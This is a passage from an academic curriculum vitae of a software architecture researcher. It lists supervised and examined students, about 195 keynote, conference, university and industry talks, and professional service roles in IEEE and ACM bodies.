- Ghazal Rafiei
  Start date: August 2023

## Doctoral Students - Dissertation Committee Member

### Current

- Omer Faruk Akgul
- Yazeed Alabdulkarim
- Reem Alfayez
- Jade Hackett
- Greg Harris
- Yannan Li
- Sara Mohammadinejad
- Khiem Ngo
- Xin Qin
- Hao Shi
- Di Wu

### Graduated

- Marwan Abi-Antoun, CMU
- Negarsadat Abolhassani
- Mohammad-Mirza Aghatabar
- Abdulmajeed Alameer
- Mohamed Al Said
- Muhammad Ali Amer
- Jesper Andersson, Linkoping University, Sweden
- Pongtip Aroonvatanaporn
- Adi Azar
- Jongmoon Baik

- Sumita Barahmand
- Pooyan Behnamghader
- Jesal Bhuta
- Yue Chen
- Zhihao Chen
- Celia Chen
- Hugo Cheung
- Leslie Cheung
- Paul Chiou
- Kun Young Chung
- Jürgen Cito, University of Zurich
- Eric Dashofy, UC Irvine
- Shirin Ebrahimi-Taghizadeh
- Alexander Egyed
- Ragy Eleish
- Alessio Gambi, University of Lugano, Switzerland
- Jiaping Gui
- Shuai Hao
- Anandi Hira
- I-De Huang
- LiGuo Huang
- Shahdad Irajpour
- Jinwoo Kim
- Hasan Kitapci
- Yoon-Ju Lee
- Ding Li
- In-Young Ko
- Supannika Koolmanojwong
- Alexander Lam
- DeWitt Lattimer
- Joo H. Lee
- Keun Lee
- Qi Li
- Sonal Mahajan
- Ali Malik
- Muhammad Murtaza
- David Naffin
- Vu Nguyen
- Brandon Paulsen
- Luis Pedrosa

- Gustavo Perez
- Monvorath Phongpaibul
- Kan Qi
- Hitesh Sajnani, UC Irvine
- Selva Samuel, Carnegie Mellon University
- Aaron Schram, University of Colorado, Boulder
- Shideh Shahidi
- Doochul Shin
- Chungha Sung
- Giordano Tamburrelli, Politecnico di Milano, Italy
- Thomas Tan
- Shahzad Tiwana
- Marcos Vieira
- Sasha Volokh
- Mian Wan
- Jingbo Wang
- Dan Wu
- Ye Yang
- Jason Yap
- Zhaoxu Zhang

## Master's Students

### Graduated

- Ian Elston
- John Morse
- Marwan Abi-Antoun
- Raghbir Banwait
- Miheer Bhachech
- Ebru Dincel
- Lei Ding
- Luka Dojcilovic
- Brian D'Souza
- Eder Figueroa
- Prakash Gupta
- Sheryl John
- Himanshu Joshi
- Suhrid Karthik
- Armagan Kilic
- Vishal Kudchadkar
- Chenggang Li

- Mehrdad Mahdavi
- Sean McCleese
- Suhas Mehta
- Daye Nam
- Mahindra Pai
- Sandeep Phadke
- Aliasgar Rampurwala
- Tatsuhiko Tomita
- Vinaynathan Viswanathan
- Michael Wakerly
- Dongwoo Won
- David Woollard

### Undergraduate Students

#### Graduated

- Nels Beckman
- Morgan Brown
- Vanessa Carson
- Justin Chen (Columbia University)
- Charles DeBergh
- Kelly Dickson
- Eric Dong
- Joshua Garcia
- Kevin Jing
- Trevor Johns
- Yi (Nick) Kuang
- Jerry Lin
- Jacob Schaider
- Anita Singh
- Markus Snelder
- Paul Wat
- Yifeng Yu

## 11 Formal Presentations

### Keynote Presentations

**P1** *Software Archipelagos as Impediments to Scientific Progress*. Montenegrin Academy of Sciences and Arts, Podgorica, Montenegro, November 2022.

**P2** *Software Archipelagos as Impediments to Scientific Progress*. Central European Conference on Information and Intelligent Systems (CECIIS 2022), Dubrovnik, Croatia, September 2022.

**P3** *Mining Architectural Information to Stem Technical Debt*. International Workshop on Mining Software Repositories for Software Architecture (MSR4SA), held with the European Conference on Software Architecture, online, September 2021.

**P4** *Human Archipelagos Have Been Induced by COVID but Architectural Archipelagos Are All Our Own Doing*. IEEE 18th International Conference on Software Architecture (ICSA 2021), online, March 2021.

**P5** *Stemming Architectural Decay in Software Systems*. Fourth International conference on Tools and Methods of Program Analysis (TMPA-2017), Moscow, Russia, March 2017.

**P6** *Software Decay as a Big-Data Problem Viewed Through the Architectural Lens*. 2016 International Simulation Multi-Conference (AsiaSim / SCS AutumnSim 2016), Beijing, China, October 2016.

**P7** *Viewing Software Decay Through the Architectural Lens*. International Symposium on Software Engineering and Applications (SEA 2015), Marina del Rey, CA, October 2015.

**P8** *What Architecture Can Teach Us About When, Where, and Why Software Systems Decay*. 9th European Conference on Software Architecture (ECSA 2015), Dubrovnik/Cavtat, Croatia, September 2015.

**P9** *Adapting Our View of Software Adaptation: An Architectural Perspective*. 9th International Symposium on Software Engineering for Adaptive and Self-Managing Systems (SEAMS 2014), Hyderabad, India, June 2014.

**P10** *PhD Research: What, Where, Why, When, How*. INCOSE/CSER Systems Engineering and Architecting Doctoral Student Network (SEANET), University of Southern California, Los Angeles, CA, March 2014.

**P11** *When, Where, and Why Software Systems Decay and What We Can Do about It*. University of California Irvine (UCI) Institute for Software Research Forum, Irvine, CA, May 2013.

**P12** *Software Architecture Challenges & Opportunities for the 21st Century: Dynamism, Mobility, Autonomy, Services, Grids & Clouds*. 11th Brazilian Symposium on Software Quality, Fortaleza, Brazil, June 2012.

**P13** *Software Architecture Challenges & Opportunities for the 21st Century: Dynamism, Mobility, Autonomy, Services, Grids & Clouds*. 5th India Software Engineering Conference (ISEC 2012), Kanpur, India, February 2012.

**P14** *Software Architecture and Mobility: A Perfect Marriage or an Uneasy Alliance*. International Workshop on Software Architectures and Mobility (SAM 2008), Leipzig, Germany, May 2008.

**P15** *Moving Architectural Description from Under the Technology Lamppost*. Brazilian Symposium on Software Components, Architectures, and Reuse (SBCARS 2007), Campinas, Brazil, August 2007.

**P16** *Moving Architectural Description from Under the Technology Lamppost*. 32nd EUROMICRO Conference on Software Engineering and Advanced Applications (EUROMICRO'06), Dubrovnik, Croatia, August, 2006.

**P17** *From Dependable Architectures to Dependable Systems*. Workshop on Architecting Dependable Systems (WADS 2004) held in conjunction with the International Conference on Dependable Systems and Networks (DSN 2004), Florence, Italy, June 2004.

## Academic Conference Presentations

**P18** *Software Architecture and COVID: A Marriage of (In)Confenience*. New and Emerging Ideas Panel: Software Architecture in the COVID-19 Reality. IEEE 18th International Conference on Software Architecture (ICSA 2021), online, March 2021.

**P19** *Online Sports Betting Through the Prism of Software Engineering*. Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2020), November 2020.

**P20** *An Architectural Style for Solving Computationally Intensive Problems on Large Networks*. (with Yuriy Brun) 15th International Symposium on Software Engineering for Adaptive and Self-Managing Systems (SEAMS 2020), Seoul, South Korea, May 2020.

**P21** *ARCADE: A Workbench for Mining Architectural Information and Identifying Technical Debt*. Workshop on the National Java Repository Project, San Diego, CA, November 2019

**P22** *Mining Architectural Information to Stem Technical Debt*. Southern California Software Engineering Symposium, Irvine, CA, June 2016.

**P23** *Viewing Software Decay Through the Architectural Lens*. 2nd Latin American School on Software Engineering, Porto Alegre, Brazil, July 2016.

**P24** *An End-to-End Domain-Specific Modeling and Analysis Platform*. 8th International Workshop on Modeling in Software Engineering (MISE 2016), Austin, TX, May 2016.

**P25** *Extracting the Essence of Software Systems' Architectures Through Unstructured-Data Mining*. Mining and Modeling Unstructured Data in Software - Challenges for the Future, Shonan Village, Japan, March 2016.

**P26** *An Empirical Study of Architectural Decay in Software Systems.* 39th International Conference on Software Engineering (ICSE 2017) Warm-up Workshop, Maceio, Brazil, October 2014.

**P27** *An ARCADE for Architecture Analytics.* Dagstuhl Seminar on Software Development Analytics, Dagstuhl, Germany, June 2014.

**P28** *Component-Aware Triggered Scenarios.* Working IEEE/IFIP Conference on Software Architecture (WICSA 2014), Sydney, Australia, April 2014.

**P29** *When, Where, and Why Software Systems Decay and What We Can Do about It.* International Symposium to Commemorate the 45th Anniversary of the First Software Engineering Conference (SE@45), University of Southern California, Los Angeles, CA, October 2013.

**P30** *Platform Architectures.* Dagstuhl Seminar on Customizing Service Platforms, Dagstuhl, Germany, April 2013.

**P31** When, Where, and Why Do Software Systems' Architectures Decay? Workshop on Modularity and Software Architecture, Rio de Janeiro, Brazil, March 2013.

**P32** *Impact Analysis for Distributed Event-Based Systems.* 6th ACM International Conference on Distributed Event-Based Systems (DEBS 2012), Berlin, Germany, July 2012.

**P33** *The Impact of Architectural Design Decisions on Non-Functional Properties of Software Systems*. OOP 2010 - Software Engineering and Management Conference, Munich, Germany, January 2010.

**P34** *A Framework for Modeling Software Product Lines*. OOP 2010 - Software Engineering and Management Conference, Munich, Germany, January 2010.

**P35** *LVC Software Architecture Support for PATFrame*. International Test and Evaluation Association (ITEA) Live Virtual Constructive Conference, El Paso, TX, January 2010.

**P36** *The Anatomy and Physiology of the Grid Revisited*. IEEE/CSSE/ISR Workshop on Software Architecture Challenges for the 21st Century, Los Angeles, CA, June 2009.

**P37** *Center for Systems and Software Engineering Overview*. IEEE/CSSE/ISR Workshop on Software Architecture Challenges for the 21st Century, Los Angeles, CA, June 2009.

**P38** *Architecture-Based Software Development of Mobile and Embedded Systems*. 2nd International ICSE Warm-up Workshop (WUP 2009), Cape Town, South Africa, April 2009.

**P39** *Service-Oriented Architectures*. 13th Ground System Architectures Workshop (GSAW 2009), Torrance, CA, March 2009.

**P40** *Architecture and Mobile/Embedded Systems - An Uneasy Alliance or a Marriage Made in Heaven*. USC-CSSE Annual Research Review Executive Workshop, Los Angeles CA, March 2009.

**P41** *Software Architecture Modeling with Uncertainty*. AADL Workshop, Los Angeles, CA, February 2009.

**P42** *Architecture and Hardware/Software/System Engineering Integration*. USC-CSSE COCOMO Workshop, Los Angeles, CA, October 2008.

**P43** *Runtime Software Adaptation: Framework, Approaches, and Styles*. (with Peyman Oreizy and Richard N. Taylor) 30th International Conference on Software Engineering (ICSE 2008), Leipzig, Germany, May 2008.

**P44** *Estimating the Energy Consumption in Pervasive Java-Based Systems.* 6th IEEE International Conference on Pervasive Computing and Communications (PerCom 2008), Hong Kong, March 2008.

**P45** *An Introduction to Architecture-Level Reliability Analysis*. Tutorial, with Roshanak Roshandel, Working IEEE/IFIP Conference on Software Architecture (WICSA), Vancouver, Canada, February 2008.

**P46** *Software Architectures and Embedded Systems*. Korean Computer Scientists and Engineers Association in America, University of Southern California, Los Angeles, CA, December 2007.

**P47** *Improving a Distributed Software System's Quality of Service via Architecture-Driven Dynamic Redeployment*. Tutorial, Brazilian Symposium on Software Components, Architectures, and Reuse (SBCARS 2007), Campinas, Brazil, August 2007.

**P48** *Construction of Analytic Frameworks for Component-Based Architectures.* Brazilian Symposium on Software Components, Architectures, and Reuse (SBCARS 2007), Campinas, Brazil, August 2007.

**P49** *From Dependable Architectures to Dependable Systems*. USC-CSSE Annual Research Review, Los Angeles, CA, February 2007.

**P50** *A Classification of Disconnected Operation Techniques*. 32nd EUROMICRO Conference on Software Engineering and Advanced Applications (EUROMICRO'06), Dubrovnik, Croatia, August, 2006.

**P51** *Improving a Distributed Software System's Quality of Service via Redeployment*. Workshop on State of the Art in Software Engineering, Rutgers University, New Brunswick, NJ, June 2006.

**P52** *The GridLite DREAM: Bringing the Grid to Your Pocket*. Monterey Workshop, Laguna Beach, CA, September 22-23, 2005.

**P53** *A View from the Trenches*. ICSE 2005 New Software Engineering Faculty Symposium, St. Louis, MO, May 2005.

**P54** *Modeling Behavior in Compositions of Software Architectural Primitives*. 19th IEEE International Conference on Automated Software Engineering (ASE 2004), Linz, Austria, September 2004.

**P55** *Toward Architecture-Based Reliability Estimation*. Workshop on Architecting Dependable Systems (WADS 2004) held in conjunction with the International Conference on Dependable Systems and Networks (DSN 2004), Florence, Italy, June 2004.

**P56** *Style-Based Software Architectural Compositions as Domain-Specific Models*. Workshop on Directions in Software Engineering Environments (WoDiSEE 2004), Edinburgh, UK, May 2004.

**P57** *Software Architectures and Embedded Systems*. Monterey Workshop on Software Engineering for Embedded Systems: From Requirements to Implementation, Chicago, IL, September 2003.

**P58** *Coupling Architectural Discovery and Recovery to Stem Architectural Erosion*. Dagstuhl Workshop on Software Architecture Recovery and Modeling (SWARM), Dagstuhl, Germany, February 2003.

**P59** *A Family of Software Architecture Implementation Frameworks*. 2002 Working IEEE/IFIP Conference on Software Architectures (WICSA-3), Montreal, Canada, August 2002.

**P60** *On the Role of Middleware in Architecture-Based Software Development*. 14th International Conference on Software Engineering and Knowledge Engineering (SEKE 2002), Ischia, Italy, July 2002.

**P61** *Architecture-Level Support for Software Component Deployment in Resource Constrained Environments*. IFIP/ACM Working Conference on Component Deployment (CD 2002), Berlin, Germany, June 2002.

**P62** *Focus: A Light-Weight, Incremental Approach to Software Architecture Recovery and Evolution.* 2001 Working IEEE/IFIP Conference on Software Architectures (WICSA-2), Amsterdam, the Netherlands, August 2001.

**P63** Software Model Connectors: Bridging Models across the Software Lifecycle. 13th International Conference on Software Engineering and Knowledge Engineering (SEKE 2001), Buenos Aires, Argentina, June 2001.

**P64** *What Young Faculty Members Still Want to Know.* ICSE 2001 New Software Engineering Faculty Symposium, Toronto, Canada, May 2001.

**P65** *Exploiting Software Architecture Implementation Infrastructure in Facilitating Component Mobility*. ICSE 2001 Workshop on Software Engineering and Mobility, Toronto, Canada, May 2001.

**P66** *xADL: Enabling Architecture-Centric Tool Integration With XML.* 34th Hawaii International Conference on System Sciences (HICSS-34), Maui, Hawaii, January 2001.

**P67** *Programming in the Small and Many: A Software Engineering Research Agenda for the 21st Century.* 2000 ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE-8), Wild Ideas and Fun Flames, San Diego, CA, November 2000.

**P68** *Towards Software Multioperability: Bridging Heterogeneous Software Interoperability Platforms.* Fourth International Software Architecture Workshop (ISAW-4), Limerick, Ireland, June 2000.

**P69** *Using Off-the-Shelf Middleware to Implement Connectors in Distributed Software Architectures.* 21st International Conference on Software Engineering (ICSE'99), Los Angeles, CA, May 1999.

**P70** A Language and Environment for Architecture-Based Software Development and Evolution. 21st International Conference on Software Engineering (ICSE'99), Los Angeles, CA, May 1999.

**P71** *Modeling Software Architectures in UML*. Workshop on Software Architectures and the Unified Modeling Language, Denver, CO, April 1999.

**P72** *An Approach to Architecture-Based Software Integration*. Ground System Architectures Workshop (GSAW 99), El Segundo, CA, March 1999.

**P73** *Assessing the Suitability of a Standard Design Method for Modeling Software Architectures*. First Working IFIP Conference on Software Architecture, San Antonio, TX, February 1999.

**P74** *A Comparative Analysis of Architecture Description Languages*. USC-CSE Annual Research Review, Los Angeles, CA, February 1999.

**P75** *Assessing UML's Suitability for Modeling Software Architectures*. USC-CSE Annual Research Review, Los Angeles, CA, February 1999.

**P76** *Employing Off-the-Shelf Connector Technologies in C2-Style Architectures*. California Software Symposium (CSS'98), Irvine, CA, October 1998.

**P77** *An Architecture-Based Approach to Software Evolution*. International Workshop on the Principles of Software Evolution, Kyoto, Japan, April 1998.

**P78** *Domains of Concern in Software Architectures and Architecture Description Languages.* USENIX Conference on Domain-Specific Languages, Santa Barbara, CA, October 1997.

**P79** *A Framework for Classifying and Comparing Architecture Description Languages.* Sixth European Software Engineering Conference together with the Fifth ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE'97), Zurich, Switzerland, September 1997.

**P80** *Reuse of Off-the-Shelf Components in C2-Style Architectures.* 1997 Symposium on Software Reusability (SSR'97) and 1997 International Conference on Software Engineering (ICSE'97), joint session on Software Reuse, Boston, MA, May 1997.

**P81** *Reusing Off-the-Shelf Components to Develop a Family of Applications in the C2 Architectural Style.* First International Workshop on Development and Evolution of Software Architectures for Product Families, Las Navas del Marqués, Spain, November 1996.

**P82** *ADLs and Dynamic Architecture Changes.* Second International Software Architecture Workshop (ISAW-2), San Francisco, CA, October 1996.

**P83** *Using Object-Oriented Typing to Support Architectural Design in the C2 Style.* Fourth ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE4), San Francisco, CA, October 1996.

**P84** *Formal Modeling of Software Architectures at Multiple Levels of Abstraction.* California Software Symposium, Los Angeles, CA, April 1996.

**P85** *A Component- and Message-Based Architectural Style for GUI Software.* Technology Presentation Track, 17th International Conference on Software Engineering (ICSE17), Seattle, WA, April 1995.

## University and Research Institute Presentations

**P86** *Mining Architectural Information to Stem Technical Debt*. Georgia Institute of Technology, Atlanta, GA, November 2019

**P87** *Mining Architectural Information to Stem Technical Debt*. University College London, UK, July 2019

**P88** *Loose Coupling in Mobile Systems: Challenges and Opportunities*. Harbin Institute of Technology, Harbin, China, April 2019.

**P89** *Mining Architectural Information to Stem Technical Debt*. Harbin Institute of Technology, Harbin, China, April 2019.

**P90** *Teaching CS and SE at USC*. Harbin Institute of Technology, Harbin, China, April 2019.

**P91** *Publishing Strategies for Top SE Venues*. Harbin Institute of Technology, Harbin, China, April 2019.

**P92** *Ph.D. Research: What, Where, Why, When, How*. Harbin Institute of Technology, Harbin, China, April 2019.

**P93** *Introduction to Software Architecture*. Faculty of Organizational Sciences, University of Belgrade, Serbia, March 2017.

**P94** *Architectural Decay in Software Systems: Symptoms, Causes, and Remedies.* University of Massachusetts, Amherst, MA, November 2013.

**P95** *Architectural Decay in Software Systems: Symptoms, Causes, and Remedies.* McGill University, Montreal, Canada, October 2013.

**P96** *When, Where, and Why Do Software Systems' Architectures Decay?* University of Lugano, Lugano, Switzerland, October 2012.

**P97** *When, Where, and Why Do Software Systems' Architectures Decay?* University of Arizona, Tucson, AZ, October 2012.

**P98** *Architectural Degradation - The Plague of Maturing Software Systems*. University of California Irvine Institute for Software Research Annual Research Review, Irvine, CA, May 2012.

**P99** *Overview of Software Engineering Research at USC*. Computer Science Department Annual Research Review, Los Angeles, CA, March 2012.

**P100** *A Framework for Maintaining a Distributed Software System's QoS*. Computer Science Department Annual Research Review, USC, Los Angeles, March 2010.

**P101** *Academic Career Work-Life Balance - A View from the Trenches*. University of Southern California, April 2011.

**P102** *Overview of Software Engineering Research at USC*. University of Southern California, Computer Science Research Day, March 2011.

**P103** *A Framework for Early Estimation of Software System Reliability*. University of California, San Diego, February 2011.

**P104** *Software Architecture and Mobility: A Perfect Marriage or an Uneasy Alliance?* University College, London, UK, October 2010.

**P105** A Framework for Early Estimation of Software System Reliability. University of Zurich, Switzerland, September 2010.

**P106** *The Future of Software Architecture: Challenges and Opportunities*. Federal University of Bahia, Salvador, Brazil, August 2010.

**P107** *Software Architecture and Mobility: A Perfect Marriage or an Uneasy Alliance?* Federal University of Rio de Janeiro, Brazil, August 2010.

**P108** Software Architecture and Mobility: A Perfect Marriage or an Uneasy Alliance? Pontifícia Universidade Católica do Rio de Janeiro, August 2010.

**P109** *A Framework for Early Estimation of Software System Reliability*. Georgia Institute of Technology, Atlanta, GA, April 2010.

**P110** *Software Architecture and Mobility: A Perfect Marriage or an Uneasy Alliance*. Institute for Software Research, Distinguished Speaker Series, University of California, Irvine, February 2010.

**P111** *Improving a Distributed Software System's Quality of Service via Architecture-Driven Dynamic Redeployment*. Institute for Software Research Forum, University of California, Irvine, June 2007.

**P112** *Dynamic Software Architectures*. Jesper Andersson Dissertation Defense Opponent, Linkoping University, Sweden, April 2007.

**P113** *From Dependable Architectures to Dependable Systems*. USC-CSE Annual Research Review, Los Angeles, CA, February 2007.

**P114** *Moving Architectural Description from Under the Technology Lamppost*. USC Center for Systems and Software Engineering Convocation, October 2006.

**P115** *Endowing Legacy Applications with Software Architectural Capabilities*. University of Southern California - Information Sciences Institute, Marina del Rey, CA, October 2006.

**P116** *The Prism Project: Software Architectural Support for Highly Distributed Environments*. Bosch Research and Technology Center, Palo Alto, CA, January 2006.

**P117** *Coupling Architectural Discovery and Recovery to Stem Architectural Erosion*. USC-CSE Annual Research Review, Los Angeles, CA, March 2003.

**P118** *Exploiting Architectural Style, Connectors, and Types in Large-Scale Software Development and Evolution.* University of Texas, Austin, TX, April 2001.

**P119** *An Architecture-Based Approach to Developing Heterogeneous, Highly Distributed Software Systems.* University of Southern California - Information Sciences Institute, Marina del Rey, CA, February 2001.

**P120** *Programming in the Many: Software Engineering Paradigm for the 21st Century.* USC-CSE Annual Research Review, Los Angeles, CA, February 2001.

**P121** *An Architecture-Based Approach to Developing Heterogeneous, Highly Distributed Software Systems.* University of Washington, Seattle, WA, January 2001.

**P122** *From Programming in the Large to Programming in the Small and Many.* University of California, Santa Cruz, CA, October 2000.

**P123** *Exploiting Architectural Style, Connectors, and Types in Large-Scale Software Development and Evolution.* Rice University, Houston, TX, September 2000.

**P124** *SAAGE — An Environment for Software Architecture, Analysis, Generation, and Evolution*. USC-CSE Annual Research Review, Los Angeles, CA, February 2000.

**P125** *A Style-Based Approach to the Design and Evolution of Adaptable Software.* University of Texas, Austin, TX, November 1997.

## Professional Organization, Industry, and Funding Agency Presentations

**P126** *On Selecting Datasets for DL-based Vulnerability* Detection. 68th Meeting of the IFIP Working Group 2.4, online, November 2023.

**P127** *On Automated Mobile-App Test Generation and Transfer*. 66th Meeting of the IFIP Working Group 2.4, Salzburg, Austria, July 2022.

**P128** *Protection of Intellectual Property Through the Prism of Software Engineering*. Logate Institute Live Meetup, Podgorica Montenegro, online, May 2022.

**P129** *Classifying and Identifying Noise in Software Patches*. 64th Meeting of IFIP Working Group 2.4, online, May 2021.

**P130** *Events in Mobile Systems: A Blessing and a Curse*. 62nd Meeting of IFIP Working Group 2.4, Port Elizabeth, South Africa, January 2020.

**P131** *Architectural Decay in Open-Source Software*, Google, Irvine, CA, October 2019.

**P132** E*nsuring Security of Android Software via Tailorable Multi-Layer Customization*. Office of Naval Research (ONR) Total Platform Cyber Protection (TPCP) Program Annual Review, Boston, MA, June 2019.

**P133** *Mining Architectural Information to Stem Technical Debt*. Google, Los Angeles, CA, June 2019.

**P134** *Architectural Decay in Large Software Systems*. Google, Los Angeles, CA, November 2017.

**P135** *Correlating Implementation Issues with Architectural Decay in Large Software Systems*. Huawei Vision Forum, Santa Clara, CA, October 2017.

**P136** *Using Architecture Recovery to Stem Software System Decay*. Huawei Vision Forum, Santa Clara, CA, October 2016.

**P137** *Software Architecture Recovery, Event-Based App Analysis, and Mobile Security*. Huawei Technologies Site Visit, University of Southern California, Los Angeles, CA, June 2016.

**P138** *Correctness, Security, and Adaptation in Distributed Event-Based Systems*. Army Research Laboratories Site Visit, University of Southern California, Los Angeles, CA, April 2016.

**P139** *The Flame Project*. Infosys Site Visit, University of Southern California, Los Angeles, CA, February 2016.

**P140** *Architectural Decay in Software Systems: Symptoms, Causes, and Remedies.* United Technologies Research Center, Hartford, CT, October 2013.

**P141** *sTile: Securing the Insecure Cloud*. DARPA Site Visit, Information Sciences Institute, Marina del Rey, CA, May 2012.

**P142** *CoDesign - A Collaborative Software Design Environment*. Infosys Site Visit, Los Angeles, CA, May 2012.

**P143** *Software Architecture Challenges & Opportunities for the 21st Century: Dynamism, Mobility, Autonomy, Services, Grids & Clouds*. Infosys, Mysore, India, March 2012.

**P144** *The Anatomy and Physiology of the Grid Revisited*. Infosys, Bangalore, India, March 2012.

**P145** *Software Architecture Challenges & Opportunities for the 21st Century: Dynamism, Mobility, Autonomy, Services, Grids & Clouds*. IBM Research, Delhi, India, February 2012.

**P146** *sTile: Securing the Insecure Cloud*. CIA, Washington, DC, November 2011.

**P147** *sTile: Securing the Insecure Cloud*. DARPA, Arlington, VA, June 2011.

**P148** *Desiderata and Challenges in Globally-Distributed Software Development*. Infosys Aurora, Las Vegas, NV, August 2011.

**P149** *Modern Software Architectural Challenges: Dynamism, Mobility, Services, Grids, and Clouds*. Aerospace Corporation, El Segundo, CA, November 2010.

**P150** *Software Architecture and Mobility: A Perfect Marriage or an Uneasy Alliance?* Northrop Grumman, Los Angeles, CA, September 2010.

**P151** *Software Architecture and Mobility: A Perfect Marriage or an Uneasy Alliance*? Infosys, Bangalore, India, December 2009.

**P152** *Software Architecture Support for PATFrame*. PATFrame project kick-off meeting, Ft. Hood, TX, August 2009.

**P153** *An Extensible Infrastructure for Collaborative Architecture-Based Development of Distributed Software-Intensive Systems*. Infosys site visit, April 2009.

**P154** *Architecture and Hardware/Software/System Engineering Integration*. Lockheed Martin Site Visit, Los Angeles, CA, December 2008.

**P155** *An Extensible Infrastructure for Collaborative Architecture-Based Development of Distributed Software-Intensive Systems*. Infosys project progress meeting, August 2008.

**P156** *An Extensible Infrastructure for Collaborative Architecture-Based Development of Distributed Software-Intensive Systems*. Infosys project kick-off meeting, August 2008.

**P157** *Architecture-Based Modeling and Simulation*. Boeing Professor Day, Seal Beach, CA, February 2008.

**P158** *Overview of Software Architecture Research at USC*. Bosch Research and Technology Center, Palo Alto, CA, January 2007.

**P159** *Identifying and Addressing Uncertainty in Architecture-Level Software Reliability Modeling*. NSF Next Generation Software Program (NSFNGS) Workshop, Long Beach, CA, February 2007.

**P160** *Multi-Framework Programming via Software Architecture and Architectural Middleware*. DARPA Multi-Framework Programming Workshop, Menlo Park, CA, August 2007.

**P161** *Overview of Software Architecture Research at USC*. USC Computer Science Department Industrial Advisory Board Meeting, Los Angeles, CA, April 2006.

**P162** *Overview of Software Architecture Research at USC.* General Electric Site Visit, Los Angeles, CA, February 2006.

**P163** *Software Architecture for DREAM Environments*. Jet Propulsion Laboratory, Pasadena, CA, January 2005.

**P164** *DeSi - An Environment for Modeling, Analyzing, and Simulating Deployment Architectures*. Boeing, Anaheim, November 2004.

**P165** *Overview of Software Architecture Research at USC.* Northrop Grumman Site Visit, Los Angeles, CA, April 2004.

**P166** *Overview of Software Architecture Research at USC.* Microsoft Site Visit, Los Angeles, CA, March 2004.

**P167** *Overview of Software Architecture Research at USC.* Airbus Site Visit, Los Angeles, CA, February 2004.

**P168** *DeSi - A Tailorable Environment for Assessing the Quality of Distributed Software Architectures*. Jet Propulsion Laboratory, Pasadena, CA, January 2004.

**P169** *Overview of Software Engineering Research at USC.* Boeing Site Visit, Los Angeles, CA, November 2003.

**P170** *Software Architecture Research at USC-CSE: An Overview.* Jet Propulsion Laboratory Site Visit, Los Angeles, CA, September 2003.

**P171** *Software Architectures and Self-Healing Systems*. Boeing, Anaheim, CA, May 2003.

**P172** *Software Architectures and Self-Healing Systems*. Boeing-DARPA Future Combat Systems Meeting, Boeing, Anaheim, CA, September 2002.

**P173** *Software Connectors for Programming-in-the-Many.* Boeing, Seattle, WA, November 2001.

**P174** Software Architecture Collaboration between JPL and USC. Jet Propulsion Laboratory, Pasadena, CA, September 2001.

**P175** *Relating State-Based and Component/Connector-Based Architectural Styles: Technical Project Review*. Jet Propulsion Laboratory, Pasadena, CA, August 2001.

**P176** *Architectural Support for Programming-in-the-Many.* U.S. Army Tank-Automotive and Armaments Command (TACOM), Detroit, MI, July 2001.

**P177** *Software Architecture Research at USC: Programming in the Large and Many.* Xerox Corporation, El Segundo, CA, January 2001.

**P178** *From Programming in the Large to Programming in the Small and Many.* Microsoft USC Site Visit, Los Angeles, December 2000.

**P179** *Software Architecture at USC and JPL.* Jet Propulsion Laboratory, Pasadena, CA, October 2000.

**P180** *Programming in the Small, Large, and Many.* Xerox Corporation, El Segundo, CA, October 2000.

**P181** *Programming in the Small, Large, and Many.* Schlumberger Corporation, Houston, TX, September 2000.

**P182** *Dynamic Assembly, Assessment, Assurance, and Adaptation via Heterogeneous Software Connectors.* DARPA/ISO DASADA Project Kick-off Meeting, Santa Fe, NM, September 2000.

**P183** *UML and Software Architectures.* DARPA/ISO DASADA Project Kick-off Meeting, Santa Fe, NM, September 2000.

**P184** *An Approach to Architecture-Based Software Development and Evolution.* Jet Propulsion Laboratory, Pasadena, CA, May 2000.

**P185** *SAAGE — An Environment for Software Architecture, Analysis, Generation, and Evolution*. Lockheed Martin USC Site Visit, Los Angeles, CA, May 2000.

**P186** *On the Role of UML in Modeling Software Architectures.* Southern California Software Process Improvement Network, Long Beach, CA, April 2000.

**P187** *Software Architecture Research and Practice.* Jet Propulsion Laboratory, Pasadena, CA, April 2000.

**P188** *Architecture-Centric Dynamic Adaptation of Deeply Networked Embedded Systems.* DARPA/ITO RENES Project Kick-off Meeting, Arlington, VA, November 1999.

**P189** *Software Architecture Research and Practice.* NSF Software Engineering Strategies Workshop Briefing, National Science Foundation, Arlington, VA, September 1999.

**P190** *Assessing the Suitability of UML for Modeling Software Architectures.* Bay Area Round Table (BART), Palo Alto, CA, July 1999.

**P191** *A Classification and Comparison Framework for Software Architecture Description Languages.* Second DARPA EDCS Architecture/Generation Workshop, Santa Fe, NM, April 1997.

**P192** *Component-Based GUI Architecture.* Hughes Aircraft Corp., El Segundo, CA, January 1997.

**P193** *What's New with C2?* Arcadia Research Meeting, Portland, OR, August 1996.

**P194** *Chiron-2: A Component- and Message-Based Architectural Style for GUI Software.* Sun Microsystems Laboratories, Palo Alto, CA, June 1995.

**P195** *Chiron-2: A Component- and Message-Based Architectural Style for GUI Software.* Bay Area Round Table (BART), Palo Alto, CA, June 1995.

# 12 Professional Service

## Professional Organization and Journal Leadership

**S1** Editor-in-Chief, IEEE Transactions on Software Engineering (1/18 - 12/22)

**S2** Chair, ACM Software System Award Committee (7/21 - 6/22)

**S3** Deputy Chair, ACM Software System Award Committee (7/20 - 6/21)

**S4** Chair, Editor-in-Chief Search Committee, ACM Transactions on Autonomous and Adaptive Systems (6/20 - 9/20)

**S5** Chair, ACM Publications Board Task Force on Improving Peer-Review Incentives (1/19 - 7/20)

**S6** Chair, ACM SIGSOFT (7/15 - 6/18)

**S7** Chair, Committee on Capture/Streaming at ACM Conferences, ACM SIG Governing Board (10/16 - 6/18)

**S8** Chair, Steering Committee, ACM SIGSOFT Symposium on the Foundations of Software Engineering (7/15 - 9/17)

**S9** Chair, Steering Committee, International Conference on Software Engineering (10/13 - 10/15)

## Editorial Boards and Steering Committee Membership

**S10** Member, Joint ICSE/FSE/ASE Conference Consolidation Committee (7/20 - present)

**S11** Member, Executive Committee, ACM Special Interest Group on Software Engineering (SIGSOFT) (7/18 – 6/24)

**S12** Member, Steering Committee, International Conference on Software Engineering (5/08 - present)

**S13** Member, Steering Committee, ACM International Conference on the Foundations of Software Engineering (FSE) (5/17 – 6/24)

**S14** Member, ICSE Journal-First Task Force (5/16 - 12/23)

**S15** Member, ACM SIG Governing Board (7/15 - 6/20)

